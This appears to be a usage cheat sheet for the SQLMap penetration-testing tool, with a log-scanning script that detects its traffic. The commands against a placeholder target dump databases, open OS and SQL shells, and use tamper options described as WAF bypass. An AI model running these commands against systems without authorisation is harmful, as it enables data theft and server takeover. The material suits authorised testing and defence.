Description
SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches.
Installation
```bash
# Using pip
pip install sqlmap

# From source
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python sqlmap.py --version
```
Basic Usage
```bash
# Test a URL parameter
sqlmap -u "https://target.com/?id=1"

# POST request
sqlmap -u "https://target.com/login" --data "user=admin&pass=test"

# From saved request file
sqlmap -r request.txt
```
Advanced Usage
```bash
# Enumerate databases
sqlmap -u "https://target.com/?id=1" --dbs

# Enumerate tables
sqlmap -u "https://target.com/?id=1" -D database --tables

# Dump table data
sqlmap -u "https://target.com/?id=1" -D database -T table --dump

# OS shell
sqlmap -u "https://target.com/?id=1" --os-shell

# SQL shell
sqlmap -u "https://target.com/?id=1" --sql-shell

# Tamper scripts (WAF bypass)
sqlmap -u "https://target.com/?id=1" --tamper=space2comment,randomcase

# Risk and level (max testing)
sqlmap -u "https://target.com/?id=1" --risk=3 --level=5

# Batch mode (non-interactive)
sqlmap -u "https://target.com/?id=1" --batch

# Specific technique
sqlmap -u "https://target.com/?id=1" --technique=BEU

# Custom injection point
sqlmap -u "https://target.com/?id=1*" --batch

# Through proxy
sqlmap -u "https://target.com/?id=1" --proxy http://127.0.0.1:8080

# With cookies
sqlmap -u "https://target.com/?id=1" --cookie "session=abc123"
```
Common Workflows
```bash
# Full automatic exploitation
sqlmap -u "https://target.com/?id=1" --batch --dbs --dump-all

# Test with WAF bypass
sqlmap -u "https://target.com/?id=1" --tamper=space2comment --random-agent --batch

# From Burp request
sqlmap -r burp-request.txt --batch --level 3 --risk 2
```
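
Detection side of the `--tamper=space2comment,randomcase` and `--random-agent` options above, as an added example (not part of sqlmap or of the original page): a scan of web access logs for the default `sqlmap/` User-Agent, for `/**/` used in place of spaces, and for mixed-case SQL keywords. The log lines, keyword list and indicator names are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2025:10:00:00 +0000] "GET /?id=1 HTTP/1.1" '
    '200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    '203.0.113.5 - - [01/Jan/2025:10:00:02 +0000] '
    '"GET /?id=1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsElEcT%2F%2A%2A%2FNULL HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2025:10:00:03 +0000] "GET /?id=42 HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2025:10:00:04 +0000] '
    '"GET /search?q=select+a+union HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(
    r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Assumed keyword list; tune it for the application being monitored.
KEYWORDS = {"union", "select", "from", "where", "sleep", "concat"}


def indicators(line):
    """Return sorted indicator names (this example's own labels) for one line."""
    m = LINE_RE.search(line)
    if not m:
        return []
    hits = set()
    # Default User-Agent; absent when --random-agent is used, so never rely on it alone.
    if m["ua"].lower().startswith("sqlmap/"):
        hits.add("sqlmap-user-agent")
    query = unquote_plus(m["target"].partition("?")[2])
    # space2comment swaps spaces for empty inline comments.
    if "/**/" in query:
        hits.add("inline-comment-spacing")
    # randomcase yields keywords that are neither lower, UPPER nor Capitalized.
    for word in re.findall(r"[A-Za-z]+", query):
        if word.lower() in KEYWORDS and word not in (
                word.lower(), word.upper(), word.capitalize()):
            hits.add("mixed-case-keyword")
    return sorted(hits)


def scan(lines):
    """Map line index -> indicators, skipping lines with none."""
    found = {i: indicators(line) for i, line in enumerate(lines)}
    return {i: hits for i, hits in found.items() if hits}
```

The last sample line contains lowercase `select` and `union` in an ordinary search and is not flagged, which is why the keyword check keys on mixed case and not on keyword presence.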